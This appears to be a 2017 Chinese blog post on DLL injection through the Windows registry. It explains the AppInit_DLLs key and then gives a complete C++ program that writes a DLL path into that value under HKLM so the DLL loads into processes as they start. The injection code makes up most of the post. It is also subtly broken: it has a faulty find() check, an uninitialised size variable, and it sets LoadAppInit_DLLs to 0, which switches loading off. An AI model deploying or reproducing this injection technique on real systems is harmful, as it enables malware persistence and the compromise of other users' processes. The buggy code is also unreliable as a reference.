动态库注入--注册表注入

  • 利用注册表注入就是在特定的键值下写入动态库的路径,

     SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Windows

      REG注入原理是利用在Windows 系统中,当REG以下键值中存在有DLL文件路径时,会跟随EXE文件的启动加载这个DLL文件路径中的DLL文件。当如果遇到有多个DLL文件时,需要用逗号或者空格隔开多个DLL文件的路径。

  • 实现流程

    其实现流程也就是操作注册表。

  • 代码实现 
      1 // RegInject.cpp : 定义控制台应用程序的入口点。
  2 //
  3 
  4 #include "stdafx.h"
  5 #include <Windows.h>
  6 #include <iostream>
  7 using namespace std;
  8 wstring GetExeDirectory();
  9 wstring GetParent(const std::wstring& FullPath);
 10 int main()
 11 {
 12 
 13     
 14     LONG ReturnValue = 0;
 15     HKEY hKey;
 16     WCHAR  RegPath[] = L"SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Windows";
 17     const wchar_t* DllName = L"Dll.dll";
 18     wstring InjectFileFullPath;
 19     InjectFileFullPath = GetExeDirectory() +
 20         L"\\" + DllName;
 21     RegEnableReflectionKey(HKEY_LOCAL_MACHINE);
 22     //打开键值  
 23     ReturnValue = RegOpenKeyEx(
 24         HKEY_LOCAL_MACHINE,
 25         RegPath,
 26         0,
 27         KEY_ALL_ACCESS,
 28         &hKey);
 29     
 30     if (ReturnValue != ERROR_SUCCESS)
 31     {
 32         return FALSE;
 33     }
 34 
 35     //查询键值  
 36     DWORD dwReadType;
 37     DWORD dwReadCount;
 38     WCHAR szReadBuff[1000] = { 0 };
 39     ReturnValue = RegQueryValueEx(hKey,
 40         L"AppInit_DLLs",
 41         NULL,
 42         &dwReadType,
 43         (BYTE*)&szReadBuff,
 44         &dwReadCount);
 45 
 46     if (ReturnValue != ERROR_SUCCESS)
 47     {
 48         return FALSE;
 49     }
 50     //是否dll名称已经在内容中  
 51     wstring strCmpBuff(szReadBuff);
 52     //strCmpBuff = szReadBuff;
 53     int a = strCmpBuff.find(InjectFileFullPath);
 54     if (strCmpBuff.find(InjectFileFullPath))
 55     {
 56         return FALSE;
 57     }
 58 
 59     //有字符串就加入空格  
 60     if (wcscmp(szReadBuff, L" ") != 0)
 61     {
 62         wcscat_s(szReadBuff, L" ");
 63     }
 64 
 65     wcscat_s(szReadBuff, InjectFileFullPath.c_str());
 66 
 67     //把dll路径设置到注册表中  
 68     ReturnValue = RegSetValueEx(hKey,
 69         L"AppInit_DLLs",
 70         0,
 71         REG_SZ,
 72         (CONST BYTE*)szReadBuff,
 73         (_tcslen(szReadBuff) + 1) * sizeof(TCHAR));
 74     DWORD v1 = 0;
 75     ReturnValue = RegSetValueEx(hKey,
 76         L"LoadAppInit_DLLs",
 77         0,
 78         REG_DWORD,
 79         (CONST BYTE*)&v1,
 80         sizeof(DWORD));
 81     return 0;
 82 }
 83 
 84 wstring GetExeDirectory()
 85 {
 86     wchar_t ProcessFullPath[MAX_PATH] = { 0 };
 87     DWORD ProcessFullPathLength = ARRAYSIZE(ProcessFullPath);
 88     GetModuleFileName(NULL, ProcessFullPath, ProcessFullPathLength);
 89 
 90     return GetParent(ProcessFullPath);
 91 }
 92 
 93 wstring GetParent(const std::wstring& FullPath)
 94 {
 95     if (FullPath.empty())
 96     {
 97         return FullPath;
 98     }
 99     auto v1 = FullPath.rfind(L"\\");
100     if (v1 == FullPath.npos)
101     {
102         v1 = FullPath.rfind(L'/');
103     }
104     if (v1 != FullPath.npos)
105     {
106         return FullPath.substr(0, v1);
107     }
108     else
109     {
110         return FullPath;
111     }
112 }

     

posted @ 2017-04-08 20:26  _小北  阅读(1544)  评论(0编辑  收藏  举报